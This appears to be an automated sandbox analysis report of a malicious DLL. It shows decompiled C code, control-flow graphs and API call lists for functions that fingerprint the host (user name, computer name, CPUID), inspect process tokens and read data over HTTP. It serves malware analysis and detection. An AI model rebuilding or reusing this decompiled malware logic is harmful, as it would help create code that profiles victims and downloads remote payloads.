                                • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 10001EAB
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,10001713,0000000A,?), ref: 10001EC3
                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,10001713,0000000A), ref: 10001ECC
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,10001713,0000000A,?), ref: 10001ED4
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.797650137.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.797669903.0000000010005000.00000040.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                • String ID: @Mt MtTt$`RtAt
                                • API String ID: 1724014008-3198888170
                                • Opcode ID: 6ddc9452e52b06252f8c475821b7316f81045a23dadab414d7ce86af3ad915a6
                                • Instruction ID: 254ce7f55be2e700fe156080e3ad539a5a5a63b5fbf22f3b945be7b030c8b019
                                • Opcode Fuzzy Hash: 6ddc9452e52b06252f8c475821b7316f81045a23dadab414d7ce86af3ad915a6
                                • Instruction Fuzzy Hash: A7217FB6A00158AFF711EFA4CC84EDF77ADEB483D1F218029FA15D7194DA7099418B60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 10001540, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120sleepnativesynchronizationCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 154 10001540-10001550 call 10001ee5 157 10001556-10001558 154->157 158 1000167a-1000167b 154->158 159 10001559-10001560 157->159 160 10001561-1000156b call 10001b5a 159->160 163 100015a2 160->163 164 1000156d-10001588 NtQuerySystemInformation 160->164 165 100015a9-100015ad 163->165 166 1000158a 164->166 167 1000158d-100015a0 call 1000167e 164->167 165->160 169 100015af-100015c8 call 10001b6f Sleep 165->169 166->167 167->165 169->159 173 100015ca-100015ce 169->173 174 100015d4-100015d7 173->174 175 10001677-10001679 173->175 176 10001628-10001642 call 10001fb2 174->176 177 100015d9-100015e4 call 10001402 174->177 175->158 182 10001644-10001652 WaitForSingleObject 176->182 183 10001668-1000166a GetLastError 176->183 184 10001622 177->184 185 100015e6-100015f8 GetLongPathNameW 177->185 186 10001654-10001658 182->186 187 1000165f-10001666 CloseHandle 182->187 188 1000166d-10001673 183->188 184->176 189 1000161a-10001620 185->189 190 100015fa-1000160b call 10001b5a 185->190 186->187 187->188 188->175 191 10001675 GetLastError 188->191 189->176 190->189 194 1000160d-10001613 GetLongPathNameW call 1000167e 190->194 191->175 196 10001618 194->196 196->176
                                C-Code - Quality: 83%
                                			E10001540(char _a4) {
				long _v8;
				long _v12;
				char _v36;
				void* __edi;
				long _t25;
				long _t27;
				long _t28;
				long _t32;
				void* _t38;
				intOrPtr _t40;
				signed int _t44;
				signed int _t45;
				long _t50;
				intOrPtr _t52;
				signed int _t53;
				void* _t57;
				void* _t60;
				signed int _t62;
				signed int _t63;
				void* _t67;
				intOrPtr* _t68;

				_t25 = E10001EE5();
				_v8 = _t25;
				if(_t25 != 0) {
					return _t25;
				}
				do {
					_t62 = 0;
					_v12 = 0;
					_t50 = 0x30;
					do {
						_t57 = E10001B5A(_t50);
						if(_t57 == 0) {
							_v8 = 8;
						} else {
							_t44 = NtQuerySystemInformation(8, _t57, _t50,  &_v12); // executed
							_t53 = _t44;
							_t45 = _t44 & 0x0000ffff;
							_v8 = _t45;
							if(_t45 == 4) {
								_t50 = _t50 + 0x30;
							}
							_t63 = 0x13;
							_t10 = _t53 + 1; // 0x1
							_t62 =  *_t57 % _t63 + _t10;
							E1000167E(_t57);
						}
					} while (_v8 != 0);
					_t27 = E10001B6F(_t57, _t62); // executed
					_v8 = _t27;
					Sleep(_t62 << 4); // executed
					_t28 = _v8;
				} while (_t28 == 9);
				if(_t28 != 0) {
					L25:
					return _t28;
				}
				if(_a4 != 0) {
					L18:
					_push(0);
					_t67 = E10001FB2(E1000169A,  &_v36);
					if(_t67 == 0) {
						_v8 = GetLastError();
					} else {
						_t32 = WaitForSingleObject(_t67, 0xffffffff);
						_v8 = _t32;
						if(_t32 == 0) {
							GetExitCodeThread(_t67,  &_v8);
						}
						CloseHandle(_t67);
					}
					_t28 = _v8;
					if(_t28 == 0xffffffff) {
						_t28 = GetLastError();
					}
					goto L25;
				}
				if(E10001402(_t53,  &_a4) != 0) {
					 *0x10004138 = 0;
					goto L18;
				}
				_t52 = _a4;
				_t68 = __imp__GetLongPathNameW;
				_t38 =  *_t68(_t52, 0, 0); // executed
				_t60 = _t38;
				if(_t60 == 0) {
					L16:
					 *0x10004138 = _t52;
					goto L18;
				}
				_t19 = _t60 + 2; // 0x2
				_t40 = E10001B5A(_t60 + _t19);
				 *0x10004138 = _t40;
				if(_t40 == 0) {
					goto L16;
				}
				 *_t68(_t52, _t40, _t60); // executed
				E1000167E(_t52);
				goto L18;
			}
























                                0x10001546
                                0x1000154b
                                0x10001550
                                0x1000167b
                                0x1000167b
                                0x10001559
                                0x10001559
                                0x1000155d
                                0x10001560
                                0x10001561
                                0x10001567
                                0x1000156b
                                0x100015a2
                                0x1000156d
                                0x10001575
                                0x1000157b
                                0x1000157d
                                0x10001582
                                0x10001588
                                0x1000158a
                                0x1000158a
                                0x10001591
                                0x10001597
                                0x10001597
                                0x1000159b
                                0x1000159b
                                0x100015a9
                                0x100015b0
                                0x100015b9
                                0x100015bc
                                0x100015c2
                                0x100015c5
                                0x100015ce
                                0x10001677
                                0x00000000
                                0x10001679
                                0x100015d7
                                0x10001628
                                0x10001628
                                0x1000163e
                                0x10001642
                                0x1000166a
                                0x10001644
                                0x10001647
                                0x1000164d
                                0x10001652
                                0x10001659
                                0x10001659
                                0x10001660
                                0x10001660
                                0x1000166d
                                0x10001673
                                0x10001675
                                0x10001675
                                0x00000000
                                0x10001673
                                0x100015e4
                                0x10001622
                                0x00000000
                                0x10001622
                                0x100015e6
                                0x100015eb
                                0x100015f2
                                0x100015f4
                                0x100015f8
                                0x1000161a
                                0x1000161a
                                0x00000000
                                0x1000161a
                                0x100015fa
                                0x100015ff
                                0x10001604
                                0x1000160b
                                0x00000000
                                0x00000000
                                0x10001610
                                0x10001613
                                0x00000000

                                APIs
                                  • Part of subcall function 10001EE5: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,1000154B), ref: 10001EF4
                                  • Part of subcall function 10001EE5: GetVersion.KERNEL32 ref: 10001F03
                                  • Part of subcall function 10001EE5: GetCurrentProcessId.KERNEL32 ref: 10001F1F
                                  • Part of subcall function 10001EE5: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 10001F38
                                  • Part of subcall function 10001B5A: HeapAlloc.KERNEL32(00000000,?,10001567,00000030,74E063F0,00000000), ref: 10001B66
                                • NtQuerySystemInformation.NTDLL ref: 10001575
                                • Sleep.KERNELBASE(00000000,00000000,00000030,74E063F0,00000000), ref: 100015BC
                                • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 100015F2
                                • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 10001610
                                • WaitForSingleObject.KERNEL32(00000000,000000FF,1000169A,?,00000000), ref: 10001647
                                • GetExitCodeThread.KERNEL32(00000000,00000000), ref: 10001659
                                • CloseHandle.KERNEL32(00000000), ref: 10001660
                                • GetLastError.KERNEL32(1000169A,?,00000000), ref: 10001668
                                • GetLastError.KERNEL32 ref: 10001675
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.797650137.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.797669903.0000000010005000.00000040.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLastLongNamePathProcess$AllocCloseCodeCreateCurrentEventExitHandleHeapInformationObjectOpenQuerySingleSleepSystemThreadVersionWait
                                • String ID: @Mt MtTt
                                • API String ID: 3479304935-608512568
                                • Opcode ID: 74c3687ed9d293a66368c12b95b97cd3079d51e485374540016578b7d69d9e27
                                • Instruction ID: 285dab0012166d7ca4fd78fd081d31803307da6268f270452850b2542231148d
                                • Opcode Fuzzy Hash: 74c3687ed9d293a66368c12b95b97cd3079d51e485374540016578b7d69d9e27
                                • Instruction Fuzzy Hash: E231BF75901626ABF711DFA48C94ADF7BECEF442E5F154126F901E7148EB31DE408BA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00D47A2E, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 103memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 197 d47a2e-d47a42 198 d47a44-d47a49 197->198 199 d47a4c-d47a5e call d44f97 197->199 198->199 202 d47a60-d47a70 GetUserNameW 199->202 203 d47ab2-d47abf 199->203 204 d47ac1-d47ad8 GetComputerNameW 202->204 205 d47a72-d47a82 RtlAllocateHeap 202->205 203->204 207 d47b16-d47b3a 204->207 208 d47ada-d47aeb RtlAllocateHeap 204->208 205->204 206 d47a84-d47a91 GetUserNameW 205->206 209 d47aa1-d47ab0 206->209 210 d47a93-d47a9f call d42c0d 206->210 208->207 211 d47aed-d47af6 GetComputerNameW 208->211 209->204 210->209 213 d47b07-d47b0a 211->213 214 d47af8-d47b04 call d42c0d 211->214 213->207 214->213
                                C-Code - Quality: 96%
                                			E00D47A2E(char __eax, void* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				void* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0xd4d270; // 0xd448b889
					_v12 = _t59;
				}
				_t64 = _t69;
				E00D44F97( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0xd4d2a4 ^ 0x46d76429;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0xd4d238, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t64 = _t62;
								 *_t69 =  *_t69 ^ E00D42C0D(_v8 + _v8, _t64);
							}
							HeapFree( *0xd4d238, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0xd4d238, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t64 = _t68;
							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E00D42C0D(_v8 + _v8, _t64);
						}
						HeapFree( *0xd4d238, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *((intOrPtr*)(_t67 + 8)) = 0;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
				return _t39;
			}



















                                0x00d47a2e
                                0x00d47a36
                                0x00d47a3a
                                0x00d47a3d
                                0x00d47a42
                                0x00d47a44
                                0x00d47a49
                                0x00d47a49
                                0x00d47a4f
                                0x00d47a51
                                0x00d47a5e
                                0x00d47abf
                                0x00d47a60
                                0x00d47a65
                                0x00d47a6b
                                0x00d47a70
                                0x00d47a7e
                                0x00d47a82
                                0x00d47a91
                                0x00d47a98
                                0x00d47a9f
                                0x00d47a9f
                                0x00d47aaa
                                0x00d47aaa
                                0x00d47a82
                                0x00d47a70
                                0x00d47ac1
                                0x00d47ac7
                                0x00d47ad1
                                0x00d47ad3
                                0x00d47ad8
                                0x00d47ae7
                                0x00d47aeb
                                0x00d47af6
                                0x00d47afd
                                0x00d47b04
                                0x00d47b04
                                0x00d47b10
                                0x00d47b10
                                0x00d47aeb
                                0x00d47b1b
                                0x00d47b1d
                                0x00d47b20
                                0x00d47b22
                                0x00d47b25
                                0x00d47b28
                                0x00d47b32
                                0x00d47b36
                                0x00d47b3a

                                APIs
                                • GetUserNameW.ADVAPI32(00000000,?), ref: 00D47A65
                                • RtlAllocateHeap.NTDLL(00000000,?), ref: 00D47A7C
                                • GetUserNameW.ADVAPI32(00000000,?), ref: 00D47A89
                                • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,00D430EE), ref: 00D47AAA
                                • GetComputerNameW.KERNEL32(00000000,00000000), ref: 00D47AD1
                                • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00D47AE5
                                • GetComputerNameW.KERNEL32(00000000,00000000), ref: 00D47AF2
                                • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,00D430EE), ref: 00D47B10
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: HeapName$AllocateComputerFreeUser
                                • String ID: Ut
                                • API String ID: 3239747167-8415677
                                • Opcode ID: 1414793870c4da559ed14fa8b6e90642c279b53e6c63a49ceba1c01fe60ffe54
                                • Instruction ID: b157432f3302821b28e2533c4596a9a1d52d47f2baa265d1ab2f5da1f5fb6fe0
                                • Opcode Fuzzy Hash: 1414793870c4da559ed14fa8b6e90642c279b53e6c63a49ceba1c01fe60ffe54
                                • Instruction Fuzzy Hash: 27310476A04209EFDB10DFA9DD81A6EB7FAEF48304F254469E505D7220EB70EE019B30
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00D49A0F, Relevance: 10.6, APIs: 7, Instructions: 81nativeCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                C-Code - Quality: 38%
                                			E00D49A0F(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E00D41525(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E00D48B22(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}



















                                0x00d49a1c
                                0x00d49a1d
                                0x00d49a1e
                                0x00d49a1f
                                0x00d49a20
                                0x00d49a24
                                0x00d49a2b
                                0x00d49a3a
                                0x00d49a3d
                                0x00d49a40
                                0x00d49a47
                                0x00d49a4a
                                0x00d49a4d
                                0x00d49a50
                                0x00d49a53
                                0x00d49a5e
                                0x00d49a60
                                0x00d49a69
                                0x00d49a71
                                0x00d49a73
                                0x00d49a85
                                0x00d49a8f
                                0x00d49a93
                                0x00d49aa2
                                0x00d49aa6
                                0x00d49aaf
                                0x00d49ab7
                                0x00d49ab7
                                0x00d49ab9
                                0x00d49ab9
                                0x00d49ac1
                                0x00d49ac7
                                0x00d49acb
                                0x00d49acb
                                0x00d49ad6

                                APIs
                                • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 00D49A56
                                • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 00D49A69
                                • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 00D49A85
                                  • Part of subcall function 00D41525: RtlAllocateHeap.NTDLL(00000000,00000000,00D41278), ref: 00D41531
                                • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 00D49AA2
                                • memcpy.NTDLL(00000000,00000000,0000001C), ref: 00D49AAF
                                • NtClose.NTDLL(?), ref: 00D49AC1
                                • NtClose.NTDLL(00000000), ref: 00D49ACB
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                • String ID:
                                • API String ID: 2575439697-0
                                • Opcode ID: f54eac8406d7301339bf260c379058cd63fd2ceb724d2686b77592f22f14cfd7
                                • Instruction ID: 8af2296eee91bd8005da06baa08d2db1eb3b4e4497ab2ee0658589c00c2f62f8
                                • Opcode Fuzzy Hash: f54eac8406d7301339bf260c379058cd63fd2ceb724d2686b77592f22f14cfd7
                                • Instruction Fuzzy Hash: 8C21E4B6950218FBDB019F95DC45EDEBFBDEF09780F108026FA05E6260D7B19A449BB0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00D45988, Relevance: 9.1, APIs: 6, Instructions: 124filenetworkCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 306 d45988-d4598f 307 d45991-d45998 call d457dd 306->307 308 d4599a-d4a574 ResetEvent InternetReadFile 306->308 307->308 314 d459a2-d459a3 307->314 312 d4a5a5-d4a5aa 308->312 313 d4a576-d4a584 GetLastError 308->313 317 d4a5b0-d4a5bf 312->317 318 d4a66d 312->318 315 d4a586-d4a594 call d429c0 313->315 316 d4a59d-d4a59f 313->316 320 d4a670-d4a676 315->320 325 d4a59a 315->325 316->312 316->320 323 d4a5c5-d4a5d4 call d41525 317->323 324 d4a668-d4a66b 317->324 318->320 328 d4a65a-d4a65c 323->328 329 d4a5da-d4a5e2 323->329 324->320 325->316 331 d4a65d-d4a666 328->331 330 d4a5e3-d4a608 ResetEvent InternetReadFile 329->330 334 d4a631-d4a636 330->334 335 d4a60a-d4a618 GetLastError 330->335 331->320 336 d4a641-d4a64b call d48b22 334->336 338 d4a638-d4a63f 334->338 335->336 337 d4a61a-d4a628 call d429c0 335->337 336->331 343 d4a64d-d4a658 call d448cb 336->343 337->336 344 d4a62a-d4a62f 337->344 338->330 343->331 344->334 344->336
                                C-Code - Quality: 71%
                                			E00D45988(void* __eax, void* __ecx) {
				long _v8;
				void* _v12;
				void* _v16;
				void _v20;
				void* __esi;
				void* _t30;
				int _t34;
				void* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				int _t45;
				void* _t54;
				long _t64;
				void* _t67;
				void* _t69;

				_t58 = __ecx;
				_t67 = __eax;
				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
					L2:
					_t30 = _t67;
					_pop(_t68);
					_t69 = _t30;
					_t64 = 0;
					ResetEvent( *(_t69 + 0x1c));
					_t34 = InternetReadFile( *(_t69 + 0x18),  &_v20, 4,  &_v8); // executed
					if(_t34 != 0) {
						L9:
						if(_v8 == 0) {
							 *((intOrPtr*)(_t69 + 0x30)) = 0;
						} else {
							 *0xd4d164(0, 1,  &_v12); // executed
							if(0 != 0) {
								_t64 = 8;
							} else {
								_t38 = E00D41525(0x1000);
								_v16 = _t38;
								if(_t38 == 0) {
									_t64 = 8;
								} else {
									_push(0);
									_push(_v8);
									_push( &_v20);
									while(1) {
										_t41 = _v12;
										_t61 =  *_t41;
										 *((intOrPtr*)( *_t41 + 0x10))(_t41);
										ResetEvent( *(_t69 + 0x1c));
										_t45 = InternetReadFile( *(_t69 + 0x18), _v16, 0x1000,  &_v8); // executed
										if(_t45 != 0) {
											goto L17;
										}
										_t64 = GetLastError();
										if(_t64 == 0x3e5) {
											_t64 = E00D429C0( *(_t69 + 0x1c), _t61, 0xffffffff);
											if(_t64 == 0) {
												_t64 =  *((intOrPtr*)(_t69 + 0x28));
												if(_t64 == 0) {
													goto L17;
												}
											}
										}
										L19:
										E00D48B22(_v16);
										if(_t64 == 0) {
											_t64 = E00D448CB(_v12, _t69);
										}
										goto L22;
										L17:
										_t64 = 0;
										if(_v8 != 0) {
											_push(0);
											_push(_v8);
											_push(_v16);
											continue;
										}
										goto L19;
									}
								}
								L22:
								_t39 = _v12;
								 *((intOrPtr*)( *_t39 + 8))(_t39);
							}
						}
					} else {
						_t64 = GetLastError();
						if(_t64 != 0x3e5) {
							L8:
							if(_t64 == 0) {
								goto L9;
							}
						} else {
							_t64 = E00D429C0( *(_t69 + 0x1c), _t58, 0xffffffff);
							if(_t64 == 0) {
								_t64 =  *((intOrPtr*)(_t69 + 0x28));
								goto L8;
							}
						}
					}
					return _t64;
				} else {
					_t54 = E00D457DD(__ecx, __eax);
					if(_t54 != 0) {
						return _t54;
					} else {
						goto L2;
					}
				}
			}


















                                0x00d45988
                                0x00d45989
                                0x00d4598f
                                0x00d4599a
                                0x00d4599a
                                0x00d4599c
                                0x00d4a556
                                0x00d4a55b
                                0x00d4a55d
                                0x00d4a56c
                                0x00d4a574
                                0x00d4a5a5
                                0x00d4a5aa
                                0x00d4a66d
                                0x00d4a5b0
                                0x00d4a5b7
                                0x00d4a5bf
                                0x00d4a66a
                                0x00d4a5c5
                                0x00d4a5ca
                                0x00d4a5cf
                                0x00d4a5d4
                                0x00d4a65c
                                0x00d4a5da
                                0x00d4a5da
                                0x00d4a5dc
                                0x00d4a5e2
                                0x00d4a5e3
                                0x00d4a5e3
                                0x00d4a5e6
                                0x00d4a5e9
                                0x00d4a5ef
                                0x00d4a600
                                0x00d4a608
                                0x00000000
                                0x00000000
                                0x00d4a610
                                0x00d4a618
                                0x00d4a624
                                0x00d4a628
                                0x00d4a62a
                                0x00d4a62f
                                0x00000000
                                0x00000000
                                0x00d4a62f
                                0x00d4a628
                                0x00d4a641
                                0x00d4a644
                                0x00d4a64b
                                0x00d4a656
                                0x00d4a656
                                0x00000000
                                0x00d4a631
                                0x00d4a631
                                0x00d4a636
                                0x00d4a638
                                0x00d4a639
                                0x00d4a63c
                                0x00000000
                                0x00d4a63c
                                0x00000000
                                0x00d4a636
                                0x00d4a5e3
                                0x00d4a65d
                                0x00d4a65d
                                0x00d4a663
                                0x00d4a663
                                0x00d4a5bf
                                0x00d4a576
                                0x00d4a57c
                                0x00d4a584
                                0x00d4a59d
                                0x00d4a59f
                                0x00000000
                                0x00000000
                                0x00d4a586
                                0x00d4a590
                                0x00d4a594
                                0x00d4a59a
                                0x00000000
                                0x00d4a59a
                                0x00d4a594
                                0x00d4a584
                                0x00d4a676
                                0x00d45991
                                0x00d45991
                                0x00d45998
                                0x00d459a3
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00d45998

                                APIs
                                • ResetEvent.KERNEL32(?,00000000,?,00000102,?,?,00000000,00000000,74E481D0), ref: 00D4A55D
                                • InternetReadFile.WININET(?,?,00000004,?), ref: 00D4A56C
                                • GetLastError.KERNEL32(?,?,?,00000000,74E481D0), ref: 00D4A576
                                • ResetEvent.KERNEL32(?), ref: 00D4A5EF
                                • InternetReadFile.WININET(?,?,00001000,?), ref: 00D4A600
                                • GetLastError.KERNEL32 ref: 00D4A60A
                                  • Part of subcall function 00D457DD: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,74E481D0), ref: 00D457F4
                                  • Part of subcall function 00D457DD: SetEvent.KERNEL32(?), ref: 00D45804
                                  • Part of subcall function 00D457DD: HttpQueryInfoA.WININET(?,20000013,?,?), ref: 00D45836
                                  • Part of subcall function 00D457DD: HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 00D4585B
                                  • Part of subcall function 00D457DD: HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 00D4587B
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: EventHttpInfoQuery$ErrorFileInternetLastReadReset$ObjectSingleWait
                                • String ID:
                                • API String ID: 2393427839-0
                                • Opcode ID: bf4da061c7da584d3d6f4acac93ddbd97c3b443c6a619692485e8883f652091a
                                • Instruction ID: e6900514173e9bb971e3474099f6760349928787b44f71b68214a3e0c03fc0b0
                                • Opcode Fuzzy Hash: bf4da061c7da584d3d6f4acac93ddbd97c3b443c6a619692485e8883f652091a
                                • Instruction Fuzzy Hash: 2641C336640A00EBDF219FA9DC44BAEB3B9EF84360F1A0528E552E7190EB30DD419B71
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00D49267, Relevance: 7.6, APIs: 5, Instructions: 83COMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E00D49267() {
				long _v8;
				long _v12;
				int _v16;
				long _t39;
				long _t43;
				signed int _t47;
				short _t51;
				signed int _t52;
				int _t56;
				int _t57;
				char* _t64;
				short* _t67;

				_v16 = 0;
				_v8 = 0;
				GetUserNameW(0,  &_v8); // executed
				_t39 = _v8;
				if(_t39 != 0) {
					_v12 = _t39;
					_v8 = 0;
					GetComputerNameW(0,  &_v8);
					_t43 = _v8;
					if(_t43 != 0) {
						_v12 = _v12 + _t43 + 2;
						_t64 = E00D41525(_v12 + _t43 + 2 << 2);
						if(_t64 != 0) {
							_t47 = _v12;
							_t67 = _t64 + _t47 * 2;
							_v8 = _t47;
							if(GetUserNameW(_t67,  &_v8) == 0) {
								L7:
								E00D48B22(_t64);
							} else {
								_t51 = 0x40;
								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
								_t52 = _v8;
								_v12 = _v12 - _t52;
								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
									goto L7;
								} else {
									_t56 = _v12 + _v8;
									_t31 = _t56 + 2; // 0xd49cb2
									_v12 = _t56;
									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
									_v8 = _t57;
									if(_t57 == 0) {
										goto L7;
									} else {
										_t64[_t57] = 0;
										_v16 = _t64;
									}
								}
							}
						}
					}
				}
				return _v16;
			}















                                0x00d49275
                                0x00d49278
                                0x00d4927b
                                0x00d49281
                                0x00d49286
                                0x00d4928c
                                0x00d49294
                                0x00d49297
                                0x00d4929d
                                0x00d492a2
                                0x00d492af
                                0x00d492bc
                                0x00d492c0
                                0x00d492c2
                                0x00d492c6
                                0x00d492c9
                                0x00d492d9
                                0x00d4932c
                                0x00d4932d
                                0x00d492db
                                0x00d492e0
                                0x00d492e1
                                0x00d492e6
                                0x00d492e9
                                0x00d492fc
                                0x00000000
                                0x00d492fe
                                0x00d49301
                                0x00d49306
                                0x00d49314
                                0x00d49317
                                0x00d4931d
                                0x00d49322
                                0x00000000
                                0x00d49324
                                0x00d49324
                                0x00d49327
                                0x00d49327
                                0x00d49322
                                0x00d492fc
                                0x00d49332
                                0x00d49333
                                0x00d492a2
                                0x00d49339

                                APIs
                                • GetUserNameW.ADVAPI32(00000000,00D49CB0), ref: 00D4927B
                                • GetComputerNameW.KERNEL32(00000000,00D49CB0), ref: 00D49297
                                  • Part of subcall function 00D41525: RtlAllocateHeap.NTDLL(00000000,00000000,00D41278), ref: 00D41531
                                • GetUserNameW.ADVAPI32(00000000,00D49CB0), ref: 00D492D1
                                • GetComputerNameW.KERNEL32(00D49CB0,?), ref: 00D492F4
                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00D49CB0,00000000,00D49CB2,00000000,00000000,?,?,00D49CB0), ref: 00D49317
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp Download File
